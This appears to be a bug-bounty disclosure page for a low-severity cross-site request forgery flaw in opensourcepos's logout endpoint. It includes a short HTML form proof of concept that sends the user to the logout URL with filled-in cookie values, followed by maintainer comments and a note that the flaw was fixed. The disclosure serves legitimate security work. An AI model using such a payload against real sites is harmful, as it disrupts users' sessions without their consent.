Cross-Site Request Forgery (CSRF) in opensourcepos/opensourcepos

Valid

Reported on

Dec 23rd 2021

Description

CSRF on logout functionality. Attacker able to logout the user by sending malicious link

Proof of Concept

<!DOCTYPE html>

<html>

<body>

<form method="GET" action="https://dev.opensourcepos.org:443/home/logout">

    <input type="text" name="csrf_cookie_ospos_v3" value="b733af2ee56ba0678b8817af620a02d9">

    <input type="text" name="ospos_session" value="0ba22e9026f4c7c24749ebab3dc6ccea38acd43f">

    <input type="submit" value="Send">

</form>

</body>

</html>

Impact

This vulnerability is capable of logout the user session

Note

This is not an attack, it is a kind of annoyance to the user , though it is a valid csrf . By Using post method + csrf token to avoid this

We are processing your report and will contact the opensourcepos team within 24 hours. 2 years ago

We have contacted a member of the opensourcepos team and are waiting to hear back 2 years ago

We have sent a follow up to the opensourcepos team. We will try again in 7 days. 2 years ago

jekkos validated this vulnerability 2 years ago

Asura-N has been awarded the disclosure bounty

The fix bounty is now up for grabs

jekkos

commented 2 years ago

Maintainer

I think this one is rather low severity, maybe some kind of DoS attack can be tricked this way which could be annoying for a user. But beside that the impact is rather low.

jekkos marked this as fixed with commit 9332d1 2 years ago

jekkos has been awarded the fix bounty

This vulnerability will not receive a CVE

to join this conversation